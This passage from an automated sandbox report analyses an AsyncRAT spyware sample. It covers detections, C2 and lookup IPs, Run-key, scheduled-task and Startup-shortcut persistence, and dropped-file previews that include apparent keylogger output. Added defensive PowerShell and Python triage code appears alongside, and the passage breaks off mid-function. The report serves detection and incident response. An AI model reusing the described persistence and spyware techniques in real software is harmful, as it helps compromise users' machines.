                            • powershell.exe: Loading BitLocker PowerShell Module. Each powershell.exe instance (and the 2 other processes) started conhost.exe.

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            Source | Detection | Scanner | Label
                            5q4X9fRo4b.exe | 84% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
                            5q4X9fRo4b.exe | 100% | Avira | TR/Spy.Gen
                            5q4X9fRo4b.exe | 100% | Joe Sandbox ML |

                            Source | Detection | Scanner | Label
                            C:\Users\user\AppData\Roaming\SystemUser32.exe | 100% | Avira | TR/Spy.Gen
                            C:\Users\user\AppData\Roaming\SystemUser32.exe | 100% | Joe Sandbox ML |
                            C:\Users\user\AppData\Roaming\SystemUser32.exe | 84% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT

                            No Antivirus matches

                            No Antivirus matches

                            Source | Detection | Scanner | Label
                            http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                            http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                            http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
                            http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
                            https://contoso.com/ | 0% | URL Reputation | safe
                            https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                            https://contoso.com/License | 0% | URL Reputation | safe
                            https://contoso.com/Icon | 0% | URL Reputation | safe
                            https://aka.ms/pscore68 | 0% | URL Reputation | safe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                            http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
                            Name | IP | Active | Malicious | Antivirus Detection | Reputation
                            ip-api.com | 208.95.112.1 | true | true | | unknown

                            Name | Malicious | Antivirus Detection | Reputation
                            147.185.221.17 | true | | unknown
                            http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
                                Name | Source | Malicious | Antivirus Detection | Reputation
                                http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.1333269390.000001C8ED9C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1422781549.0000022BA8EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1565537713.0000024CB0050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                http://crl.mQo | powershell.exe, 0000000C.00000002.1436589079.0000022BB15AA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                http://wwoft.com/pki/cert | powershell.exe, 0000000C.00000002.1436589079.0000022BB15AA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                http://schemas.mic5d | powershell.exe, 00000008.00000002.1340691881.000001C8F5FF0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                https://go.microsoft.co | powershell.exe, 0000000F.00000002.1578558760.0000024CB8384000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.1318985953.000001C8DDB79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B990A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024CA020A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                                http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.1318985953.000001C8DDB79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B990A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024CA020A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                https://contoso.com/ | powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.1333269390.000001C8ED9C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1422781549.0000022BA8EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1565537713.0000024CB0050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                https://contoso.com/License | powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                https://contoso.com/Icon | powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                http://www.microsoft.coU | powershell.exe, 00000008.00000002.1341620056.000001C8F619F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.1318985953.000001C8DD951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B98E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024C9FFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E101000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 5q4X9fRo4b.exe, 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1318985953.000001C8DD951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B98E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024C9FFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E101000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                https://github.com/Pester/Pester | powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                                              IP | Domain | Country | ASN | ASN Name | Malicious
                                              208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
                                              147.185.221.17 | unknown | United States | 12087 | SALSGIVERUS | true
                                              Joe Sandbox version: 41.0.0 Charoite
                                              Analysis ID: 1530274
                                              Start date and time: 2024-10-09 23:03:09 +02:00
                                              Joe Sandbox product: CloudBasic
                                              Overall analysis duration: 0h 6m 28s
                                              Hypervisor based Inspection enabled: false
                                              Report type: full
                                              Cookbook file name: default.jbs
                                              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of new started processes analysed: 29
                                              Number of new started drivers analysed: 0
                                              Number of existing processes analysed: 0
                                              Number of existing drivers analysed: 0
                                              Number of injected processes analysed: 0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode: default
                                              Analysis stop reason: Timeout
                                              Sample name: 5q4X9fRo4b.exe (renamed because the original name is a hash value)
                                              Original Sample Name: af9ce09585744c97e4c856c8e6124d8a842714dfd5101e27eaff721220679802.exe
                                              Detection: MAL
                                              Classification: mal100.troj.spyw.evad.winEXE@20/21@1/2
                                              EGA Information:
                                              • Successful, ratio: 11.1%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 92
                                              • Number of non-executed functions: 11
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target SystemUser32.exe, PID 1316 because it is empty
                                              • Execution Graph export aborted for target SystemUser32.exe, PID 1916 because it is empty
                                              • Execution Graph export aborted for target SystemUser32.exe, PID 3020 because it is empty
                                              • Execution Graph export aborted for target SystemUser32.exe, PID 8164 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 6408 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7652 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7880 because it is empty
                                              • Not all processes were analyzed; the report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information
                                              • Report size getting too big, too many NtCreateKey calls found
                                              • Report size getting too big, too many NtOpenKeyEx calls found
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found
                                              • Report size getting too big, too many NtQueryValueKey calls found
                                              • Report size getting too big, too many NtReadVirtualMemory calls found
                                              • VT rate limit hit for: 5q4X9fRo4b.exe
Time      Type             Description
00:42:43  Task Scheduler   Run new task: SystemUser32 path: C:\Users\user\AppData\Roaming\SystemUser32.exe
00:42:47  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemUser32 C:\Users\user\AppData\Roaming\SystemUser32.exe
00:42:55  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemUser32 C:\Users\user\AppData\Roaming\SystemUser32.exe
00:43:04  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser32.lnk
17:04:08  API Interceptor  52x Sleep call for process: powershell.exe modified
18:42:43  API Interceptor  487300x Sleep call for process: 5q4X9fRo4b.exe modified
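The timeline above records three user-level persistence mechanisms set up within about twenty seconds of each other: a scheduled task, an HKCU Run value (the HKCU and HKCU64 lines are the same value seen through the 32- and 64-bit registry views) and a .lnk in the per-user Startup folder, all pointing at SystemUser32.exe under %APPDATA%\Roaming. The PowerShell below is an added triage example, not code from the Joe Sandbox report or from the sample: it enumerates the same three locations on a live host and flags entries that carry the reported name or whose target lives under a user-writable profile directory. The cmdlets are standard Windows ones; the name SystemUser32 is taken from the report; the list of "suspect roots" is an assumption chosen for this example, and the check is deliberately broader than this one sample.

```powershell
# Added example (not part of the Joe Sandbox report). Run as the affected user.
# Checks the three persistence locations listed in the report's behaviour timeline.

function Get-UserPersistence {
    [CmdletBinding()]
    param(
        # Name reported by the sandbox; used only to highlight matches.
        [string]$SuspectName = 'SystemUser32',
        # ASSUMPTION: user-writable roots where RATs commonly drop their copy.
        [string[]]$SuspectRoots = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP)
    )

    $findings = [System.Collections.Generic.List[object]]::new()

    function Add-Finding([string]$Source, [string]$Name, [string]$Target) {
        $inUserDir = $false
        foreach ($root in $SuspectRoots) {
            if ($Target -and $root -and
                $Target.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
                $inUserDir = $true
            }
        }
        $findings.Add([pscustomobject]@{
            Source       = $Source
            Name         = $Name
            Target       = $Target
            NameMatch    = ($Name -like "*$SuspectName*") -or ($Target -like "*$SuspectName*")
            UserWritable = $inUserDir
        })
    }

    # 1. Scheduled tasks ("Run new task: SystemUser32 path: ...\Roaming\SystemUser32.exe")
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        foreach ($action in $_.Actions) {
            if ($action.Execute) {
                $exe = [Environment]::ExpandEnvironmentVariables($action.Execute)
                Add-Finding -Source "Task $($_.TaskPath)" -Name $_.TaskName -Target $exe
            }
        }
    }

    # 2. HKCU Run key (one key; the report shows it through both registry views)
    $runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    if (Test-Path $runKey) {
        $props = Get-ItemProperty -Path $runKey
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -notin 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') {
                Add-Finding -Source 'HKCU Run' -Name $p.Name -Target ([string]$p.Value)
            }
        }
    }

    # 3. Per-user Startup folder: resolve each .lnk to the binary it launches
    $startup = [Environment]::GetFolderPath('Startup')
    $shell = New-Object -ComObject WScript.Shell
    Get-ChildItem -Path $startup -Filter '*.lnk' -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)
        Add-Finding -Source 'Startup folder' -Name $_.Name -Target $lnk.TargetPath
    }

    return $findings
}

# Usage: anything flagged NameMatch or UserWritable deserves a look; the entries in this
# report would hit both, since the target is C:\Users\<user>\AppData\Roaming\SystemUser32.exe.
Get-UserPersistence | Where-Object { $_.NameMatch -or $_.UserWritable } | Format-Table -AutoSize
```

Resolving the .lnk target matters: the Startup entry by itself only names SystemUser32.lnk, and it is the shortcut's TargetPath that ties it back to the same dropped executable the task and the Run value launch.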
IPs
Match         Associated Sample Name / URL        SHA 256   Detection  Threat Name                                                 Link    Context
208.95.112.1  1yvSMiC8Jt.exe                      Get hash  malicious  XWorm                                                       Browse  ip-api.com/line/?fields=hosting
              WCA-Cooperative-Agreement.docx.exe  Get hash  malicious  Babadeda, Exela Stealer, Python Stealer, Waltuhium Grabber  Browse  ip-api.com/json
              a3bZQko7Vi.exe                      Get hash  malicious  AgentTesla                                                  Browse  ip-api.com/line/?fields=hosting
              Wt7zcwGIYK.exe                      Get hash  malicious  AgentTesla, PureLog Stealer                                 Browse  ip-api.com/line/?fields=hosting
              FUFhVN38a7.exe                      Get hash  malicious  AgentTesla                                                  Browse  ip-api.com/line/?fields=hosting
              s6wkPrgsjG.exe                      Get hash  malicious  AgentTesla                                                  Browse  ip-api.com/line/?fields=hosting
              78nah2nPON.exe                      Get hash  malicious  AgentTesla                                                  Browse  ip-api.com/line/?fields=hosting
              DxsHvFEbpk.exe                      Get hash  malicious  AgentTesla                                                  Browse  ip-api.com/line/?fields=hosting
              Ref_50102_607UU.exe                 Get hash  malicious  AgentTesla                                                  Browse  ip-api.com/line/?fields=hosting
              Lv8JkokoUa.exe                      Get hash  malicious  AgentTesla, DarkTortilla                                    Browse  ip-api.com/line/?fields=hosting

Domains
Match       Associated Sample Name / URL        SHA 256   Detection  Threat Name                                                 Link    Context
ip-api.com  1yvSMiC8Jt.exe                      Get hash  malicious  XWorm                                                       Browse  208.95.112.1
            WCA-Cooperative-Agreement.docx.exe  Get hash  malicious  Babadeda, Exela Stealer, Python Stealer, Waltuhium Grabber  Browse  208.95.112.1
            a3bZQko7Vi.exe                      Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
            Wt7zcwGIYK.exe                      Get hash  malicious  AgentTesla, PureLog Stealer                                 Browse  208.95.112.1
            FUFhVN38a7.exe                      Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
            s6wkPrgsjG.exe                      Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
            78nah2nPON.exe                      Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
            DxsHvFEbpk.exe                      Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
            Ref_50102_607UU.exe                 Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
            Lv8JkokoUa.exe                      Get hash  malicious  AgentTesla, DarkTortilla                                    Browse  208.95.112.1

ASNs
Match        Associated Sample Name / URL                             SHA 256   Detection  Threat Name                                                 Link    Context
SALSGIVERUS  l18t80u9zg.exe                                           Get hash  malicious  XWorm                                                       Browse  147.185.221.22
             Windows Defender.exe                                     Get hash  malicious  XWorm                                                       Browse  147.185.221.22
             x2Yi9Hr77a.exe                                           Get hash  malicious  XWorm                                                       Browse  147.185.221.23
             e7WMhx18XN.exe                                           Get hash  malicious  SilentXMRMiner, Xmrig                                       Browse  147.185.221.22
             SecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exe  Get hash  malicious  Njrat                                                       Browse  147.185.221.22
             1c8DbXc5r0.exe                                           Get hash  malicious  XWorm                                                       Browse  147.185.221.18
             PixpFUv4G7.exe                                           Get hash  malicious  Quasar, XWorm                                               Browse  147.185.221.21
             H2f8SkAvdV.exe                                           Get hash  malicious  Blank Grabber, XWorm                                        Browse  147.185.221.23
             A39tzaySzX.exe                                           Get hash  malicious  AsyncRAT, XWorm                                             Browse  147.185.221.23
             Bpz46JayQ4.exe                                           Get hash  malicious  XWorm                                                       Browse  147.185.221.22
TUT-ASUS     1yvSMiC8Jt.exe                                           Get hash  malicious  XWorm                                                       Browse  208.95.112.1
             WCA-Cooperative-Agreement.docx.exe                       Get hash  malicious  Babadeda, Exela Stealer, Python Stealer, Waltuhium Grabber  Browse  208.95.112.1
             a3bZQko7Vi.exe                                           Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
             Wt7zcwGIYK.exe                                           Get hash  malicious  AgentTesla, PureLog Stealer                                 Browse  208.95.112.1
             FUFhVN38a7.exe                                           Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
             s6wkPrgsjG.exe                                           Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
             78nah2nPON.exe                                           Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
             DxsHvFEbpk.exe                                           Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
             Ref_50102_607UU.exe                                      Get hash  malicious  AgentTesla                                                  Browse  208.95.112.1
             Lv8JkokoUa.exe                                           Get hash  malicious  AgentTesla, DarkTortilla                                    Browse  208.95.112.1

JA3 Fingerprints
No context

Dropped Files
No context
                                              Process:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):654
                                              Entropy (8bit):5.380476433908377
                                              Encrypted:false
                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
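The 654-byte CSV above, written by the persisted copy SystemUser32.exe, has the four-column layout of a .NET CLR usage log: a record kind, a name, a value or native-image path, and a flag. Kind 1 rows are runtime properties (fusion/GAC, WinRT/NotApp); kind 3 rows name an assembly together with the native image (.ni.dll) it was resolved to, and kind 2 rows, which carry the IL image path, belong to the same format but do not appear in this preview. The report does not give the file's path, so the UsageLogs directory used by the host-wide function below is an assumption based on that format. The PowerShell is an added example, not code from the report or from the sample: it parses the preview as shown and, on a live host, lists which .NET executables left such a log for the current user and what they loaded, which is how this artifact is used as execution evidence during triage.

```powershell
# Added example (not part of the Joe Sandbox report). Parses the four-column CSV the
# report shows SystemUser32.exe dropping, and optionally every such log on a live host.
# ASSUMPTION: the layout is the .NET CLR usage log; its usual on-disk location,
# %LOCALAPPDATA%\Microsoft\CLR_v4.0\UsageLogs\<exe>.log, is not stated in the report.

function ConvertFrom-ClrUsageLog {
    param([Parameter(Mandatory)][string[]]$Lines)

    # Kind 1 = runtime property; kind 2 = IL assembly path; kind 3 = native image path.
    $Lines | Where-Object { $_.Trim() } |
        ConvertFrom-Csv -Header Kind, Name, Value, Flag |
        ForEach-Object {
            $isAssembly = ($_.Kind -eq '2' -or $_.Kind -eq '3')
            [pscustomobject]@{
                Kind     = [int]$_.Kind
                Assembly = if ($isAssembly) { ($_.Name -split ',')[0].Trim() } else { $null }
                Version  = if ($isAssembly -and $_.Name -match 'Version=([\d.]+)') { $Matches[1] } else { $null }
                Path     = if ($isAssembly) { $_.Value } else { $null }
                Property = if (-not $isAssembly) { "$($_.Name)=$($_.Value)" } else { $null }
                Flag     = [int]$_.Flag
            }
        }
}

function Get-ClrUsageEvidence {
    # One row per log: the log file name is the image name of the .NET process that wrote it.
    # ASSUMPTION: UsageLogs path below; adjust if the environment differs.
    param([string]$LogDir = (Join-Path $env:LOCALAPPDATA 'Microsoft\CLR_v4.0\UsageLogs'))

    Get-ChildItem -Path $LogDir -Filter '*.log' -ErrorAction SilentlyContinue | ForEach-Object {
        $records = ConvertFrom-ClrUsageLog -Lines (Get-Content -Path $_.FullName)
        [pscustomobject]@{
            Executable = $_.BaseName
            LastWrite  = $_.LastWriteTime
            Assemblies = ($records | Where-Object Kind -eq 3 | ForEach-Object Assembly) -join ', '
        }
    }
}

# Constructed sample: the report's preview of the dropped CSV with its CRLF line breaks restored.
$sample = @(
    '1,"fusion","GAC",0'
    '1,"WinRT","NotApp",1'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0'
    '3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0'
)

# Parse the sample: three kind-3 rows (System, System.Core, Microsoft.VisualBasic) and two properties.
ConvertFrom-ClrUsageLog -Lines $sample | Where-Object Kind -eq 3 | Format-Table Assembly, Version, Path -AutoSize

# On a live host, look for the dropped name from the report:
# Get-ClrUsageEvidence | Where-Object Executable -eq 'SystemUser32.exe'
```

The log survives after the process exits and after the executable is deleted, so a UsageLogs entry named after the dropped file is a cheap confirmation that the .NET binary actually ran under that user, independent of the scheduled task and Run-key artifacts.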
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................
                                              Process:C:\Users\user\Desktop\5q4X9fRo4b.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):41
                                              Entropy (8bit):3.7195394315431693
                                              Encrypted:false
                                              SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                              MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                              SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                              SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                              SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                              Malicious:false
                                              Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              (15 further dropped-file entries from powershell.exe with content and hashes identical to the entry above are omitted.)
                                              Process:C:\Users\user\Desktop\5q4X9fRo4b.exe
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Oct 9 21:42:43 2024, mtime=Wed Oct 9 21:42:43 2024, atime=Wed Oct 9 21:42:43 2024, length=42496, window=hide
                                              Category:dropped
                                              Size (bytes):795
                                              Entropy (8bit):5.121964746864871
                                              Encrypted:false
                                              SSDEEP:12:8Iq4JSN+2Ch/i1Y//bouLD20zKI8eGEKfEWKlZjA7NHtBR+fEWKlpd5zBmV:8+V2c9RDzKIZGEyKldAfH+3Klpd5tm
                                              MD5:7135E092938FAA11E6F00C551234F3B3
                                              SHA1:DA0EB051C10281506CD928561ADBEB2DED16A4C6
                                              SHA-256:1D1C78C6C1AA411DF1579091397C757CBA7AF23FEF7A781BF5897C0FB8FA76BE
                                              SHA-512:98741AFD6F6CC95921D60F9BB7DD843039E23DE015B401B8A893E86F01EF29A1ECAE06C71938B23EB9E1529CF8CB48F872650FD6959B2D6EF5C2EC7C127E44E7
                                              Malicious:false
                                              Preview:L..................F.... ............!........................................:..DG..Yr?.D..U..k0.&...&......Qg.*_..........#]..........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=IYL...........................3*N.A.p.p.D.a.t.a...B.V.1.....IY|...Roaming.@......EW.=IY|...............................R.o.a.m.i.n.g.....n.2.....IYV. .SYSTEM~1.EXE..R......IYV.IYV.....<'....................`...S.y.s.t.e.m.U.s.e.r.3.2...e.x.e.......b...............-.......a............W.O.....C:\Users\user\AppData\Roaming\SystemUser32.exe........\.....\.....\.....\.....\.S.y.s.t.e.m.U.s.e.r.3.2...e.x.e.`.......X.......899552...........hT..CrF.f4... ..........,......hT..CrF.f4... ..........,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
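The shortcut above is 795 bytes and, as the preview shows, resolves to C:\Users\user\AppData\Roaming\SystemUser32.exe (length=42496, the same size and, per the next entry, the same hashes as the submitted sample) via the relative path ..\..\..\..\..\SystemUser32.exe. Shortcuts are a common persistence vehicle, so triage should extract the target instead of trusting the shortcut's name. The following is an added example, not part of the Joe Sandbox report, that parses a .lnk according to the MS-SHLLINK layout (fixed 76-byte header, optional LinkTargetIDList, LinkInfo with LocalBasePath and CommonPathSuffix, then the StringData fields) and applies an assumed triage rule flagging executables launched from user-writable profile directories. The bytes it parses are constructed by build_lnk() with the same target, relative path and size; they are not the dropped file itself.

```python
"""Pull the target out of a Windows shortcut (MS-SHLLINK) for persistence triage.
Added example, not part of the Joe Sandbox report; SAMPLE_LNK is constructed by
build_lnk() with the dropped shortcut's target, relative path and size and is not
the 795-byte file itself. The rule in is_suspicious_target() is an assumption."""
import struct

HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01          # LinkInfoFlags bit 0
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def _cstr(buf, off):
    """NUL-terminated ANSI string starting at buf[off]."""
    return buf[off:buf.index(b"\x00", off)].decode("latin-1")


def parse_lnk(data: bytes) -> dict:
    """Return the resolved target plus the StringData fields that matter for triage."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE \
            or data[4:20] != LINK_CLSID:
        raise ValueError("not a ShellLink file")
    flags, attrs = struct.unpack_from("<II", data, 20)
    file_size = struct.unpack_from("<I", data, 52)[0]
    off, target = HEADER_SIZE, None
    if flags & HAS_LINK_TARGET_ID_LIST:              # shell item IDs: skipped, LinkInfo is used
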